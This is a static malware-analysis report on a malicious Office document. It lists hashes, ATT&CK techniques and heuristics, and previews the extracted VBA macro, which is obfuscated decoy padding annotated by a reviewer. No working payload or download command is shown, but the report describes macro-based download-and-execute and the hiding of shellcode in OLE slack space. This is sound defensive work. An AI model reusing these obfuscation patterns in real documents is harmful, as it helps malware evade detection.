Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 642c879477d3fee0…

MALICIOUS

Office (OLE)

146.8 KB First seen: 2019-09-30
MD5: fa00b350189d3775807064a7133d91cd SHA-1: a3b123f2de764e5d3055425e94590e3cf53b2fb7 SHA-256: 642c879477d3fee0d34c63b65718f4710da02fc6f9e128311263761dfd9f6e11
Risk Score: 62

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an OLE document with a significant amount of slack space and detected VBA macros. The VBA macro code is heavily obfuscated, but its presence, combined with the OLE slack anomaly, suggests it is designed to download and execute a secondary payload. The embedded URL is benign — it is the standard DrawingML schema namespace identifier rather than a download location — and is not itself a detection; it is listed because URLs found in document text are routinely recorded when triaging macro-based malware.

Heuristics 3

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 150,311 bytes but its declared streams total only 52,125 bytes — 98,186 bytes (65%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37791 bytes
SHA-256: 214231ebe496ea88f9d2ad986efa2491d8b05cd8d663fa24cd3397575f4085e0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BlUkafEw"
' Module name as exported by olevba. No "Option Explicit" follows, so every
' undeclared name used in the functions below compiles as an Empty Variant.
' NOTE(review): AGivahsoE is one of several structurally identical private
' functions in this module. Every name it compares, reads or assigns
' (FThhd, WEXAkU, asHsw, EMDHj, EIPAo, ...) has no declaration or assignment
' anywhere in the visible preview, and the function never assigns its own
' name, so it returns no value. With the error handler below suppressing the
' failures these Set statements would otherwise raise, the body appears to be
' filler/decoy code that pads and obscures the module rather than doing work;
' any live logic is presumably in the part of the script the preview
' truncates. Confirm against the full olevba output before relying on this.
Private Function AGivahsoE()
' Swallows every runtime error for the rest of the function. Undeclared names
' are Empty Variants here, and "Set x = <Empty>" would raise "Object
' required" — this line makes each such statement a silent no-op.
On Error Resume Next
   ' Empty = 19 is False, so only the Else branch is reached; both branches
   ' are object assignments from undefined names and do nothing under the
   ' error handler.
   If FThhd = 19 Then
      Set asHsw = WEXAkU
      Else
      Set ojNpw = EWGYcj
   End If
   If mRLSGv = 19 Then
      Set wWLdtq = zviqw
      Else
      Set Kqsilw = tTTfI
   End If
   ' Bitwise And against a literal; if EMDHj is Empty this evaluates to 0
   ' (False) and the inner block is skipped.
   If EMDHj And 9 Then
      If IfJzws And JiIXkN Then
         ' Oct() returns an octal string; Dkioac is never read again in this
         ' function, so even if reached the value is discarded.
         Dkioac = Oct(67555 - EIPAo)
      End If
   End If
   If OzjLmD = 19 Then
      Set YZHDAw = LXfAoY
      Else
      Set ZOSVpU = CSibRA
   End If
   If ZRcuzw And 9 Then
      If qRDNH And sZUDrQ Then
         ' Same discarded Oct() computation as above, different constant.
         TdOhD = Oct(94070 - aBivDn)
      End If
   End If
   If qvqNC = 19 Then
      Set uQkMUz = inLJYU
      Else
      Set vCuqCJ = piIJTY
   End If
   If ZNdNhZ = 19 Then
      Set iVjzJ = NXliTk
      Else
      Set oAzKs = FibCAY
   End If
End Function
' NOTE(review): nMhdZWpMBLCs repeats the same five-way "= 19 / Set" pattern
' as the other private functions in this module, over names (Lqlmz, kfDjU,
' vZjhI, ...) that have no visible declaration or assignment. It never
' assigns its own name and so returns nothing; it reads as filler/decoy
' code. Confirm against the untruncated script.
Private Function nMhdZWpMBLCs()
' Error suppression for the whole body: without it each Set on an undefined
' (Empty) name would fail with "Object required".
On Error Resume Next
   ' Empty = 19 is False, so the Else branch runs each time; both branches
   ' are no-ops under the error handler.
   If Lqlmz = 19 Then
      Set vZjhI = kfDjU
      Else
      Set pYKjAM = cUdqS
   End If
   If RnwXM = 19 Then
      Set VkniF = OqHun
      Else
      Set DzYSd = VROzuQ
   End If
   If cVIct = 19 Then
      Set DioNf = VClKJ
      Else
      Set rJCYN = qYOUzS
   End If
   If zBuPW = 19 Then
      Set mwpHjw = zrUqJ
      Else
      Set VbYDD = flUHi
   End If
   If fQBTI = 19 Then
      Set ojitT = oQYqhu
      Else
      Set nwNnaw = HqoRqH
   End If
End Function
' NOTE(review): czksKhLRNZ is another instance of the module's no-op template:
' five "If <undefined> = 19 Then Set ... Else Set ..." blocks over names
' (qbQju, BvEYp, dDYozK, ...) with no visible declaration or assignment, no
' assignment to the function name, hence no return value. Likely padding to
' inflate and obscure the module — verify against the full script.
Private Function czksKhLRNZ()
' Makes the "Object required" errors from the Set statements below silent.
On Error Resume Next
   ' Empty = 19 is False; the Else branch is taken and does nothing under
   ' the error handler.
   If qbQju = 19 Then
      Set dDYozK = BvEYp
      Else
      Set ftimr = Cdjsf
   End If
   If pwIch = 19 Then
      Set mEDVf = wJrlzD
      Else
      Set XDRazS = YSYBUo
   End If
   If XGfpwN = 19 Then
      Set mZIBn = aVIlGt
      Else
      Set DZbHp = MrBwL
   End If
   If HmQVGG = 19 Then
      Set pkGlj = rwhUum
      Else
      Set mowfXz = BIkcw
   End If
   If snEni = 19 Then
      Set hiTSpb = hPKhCZ
      Else
      Set rSolw = hJhzi
   End If
End Function
' NOTE(review): lmfXoCMOmujOhu is the only function in the preview that takes
' a parameter, but bPTjczlSfQw is never referenced in the body; the body is
' the same five-way "= 19 / Set" no-op template as the other private
' functions, over names (iAmmB, jvEQU, zJwBwp, ...) with no visible
' declaration or assignment, and the function name is never assigned, so
' nothing is returned. The unused parameter suggests a decoy signature —
' confirm against the untruncated script whether anything calls it.
Private Function lmfXoCMOmujOhu(bPTjczlSfQw)
' Suppresses the "Object required" error each Set below would raise on an
' Empty name, turning the whole body into a silent no-op.
On Error Resume Next
   ' Empty = 19 is False, so the Else branch runs; neither branch has an
   ' observable effect under the error handler.
   If iAmmB = 19 Then
      Set zJwBwp = jvEQU
      Else
      Set YJKsr = jCBqn
   End If
   If JiPDn = 19 Then
      Set CddqWn = dzSYjk
      Else
      Set cJzYIu = UlwSI
   End If
   If tTrQfS = 19 Then
      Set vTnEQq = kcGDJh
      Else
      Set hrvtSh = hXNfoz
   End If
   If TFQhOd = 19 Then
      Set DicnBT = FwFjM
      Else
      Set wWNkCO = aZbtbm
   End If
   If zszlDH = 19 Then
      Set PquqNM = jiQtV
      Else
      Set wsjfAi = iCiMP
   End If
End Function
' NOTE(review): FFvJVDHW follows the module's filler template — five
' "If <undefined> = 19 Then Set ... Else Set ..." blocks over names (AjSss,
' lVzNN, iQKrFM, ...) that are neither declared nor assigned anywhere
' visible, with no assignment to the function name and therefore no return
' value. Treat as padding/decoy code unless the truncated remainder shows
' otherwise.
Private Function FFvJVDHW()
' Error suppression: the Set statements below would otherwise fail with
' "Object required" when their right-hand side is an Empty Variant.
On Error Resume Next
   ' Empty = 19 is False; only the Else branch is reached, and it is a
   ' no-op under the error handler.
   If AjSss = 19 Then
      Set iQKrFM = lVzNN
      Else
      Set hbooA = dVkAjo
   End If
   If MHniJc = 19 Then
      Set uccBQ = kVCdu
      Else
      Set XnfUZz = HfIfNv
   End If
   If TzwrlJ = 19 Then
      Set dwOjB = lKnYqt
      Else
      Set IjMuS = PHwQd
   End If
   If XAlWFb = 19 Then
      Set CEcaH = hrLwbq
      Else
      Set GjknDY = twfik
   End If
   If VkYRS = 19 Then
      Set pMEHl = TjYvBo
      Else
      Set HdqQwS = HKDYtp
   End If
End Function
' NOTE(review): QIWiKCjNnz is another copy of the module's no-op template:
' five "= 19 / Set" blocks over names (WpAuzr, VZlwP, ujnNf, ...) with no
' visible declaration or assignment, no assignment to the function name, so
' nothing is returned. The repetition of this exact shape across every
' function in the preview is itself a useful static signature for this
' obfuscator; confirm the live logic against the full olevba output.
Private Function QIWiKCjNnz()
' Silences the "Object required" error each Set below would raise on an
' Empty name.
On Error Resume Next
   ' Empty = 19 is False, so the Else branch runs and does nothing under the
   ' error handler.
   If WpAuzr = 19 Then
      Set ujnNf = VZlwP
      Else
      Set FSNEu = PnVDR
   End If
   If sHRuA = 19 Then
      Set tmuFPp = wZEwdR
      Else
      Set YHacv = qswpP
   End If
   If zJkqHl = 19 Then
      Set EFsrd = qGpczR
      Else
      Set rwJIk = njDkq
   End If
   If liOkj = 19 Then
      Set LBBAZW = AQJwsF
      Else
      Set IkBzb = BziBU
   End If
   If XIIrEs = 19 Then
      Set GVqvk = JFXaEr
      Else
      Set OwAhPJ = cNXAfX
   End If
End Function
Private Function NPJJrwU()
On Error Resume Next
   If YYYicc = 19 Then
      Set AaKwQO = zJBzu
      Else
      Set TiBWA = zWCDBR
   End If
   If Dvlsvf = 19 Then
      Set NUAjuS = UWsDQ
      Else
      Set HpXBd = fbzXIj
   End If
   If bATij = 19 Then
      Set TDCGji = hpzmvB
      Else
      Set EqCzpj = vmmSt
   End If
   If MFMaUq = 19 Then
      Set zCcRGb = JWXIj
      Else
      Set uLiLj = TfuBK
   End If
   If zb
... (truncated)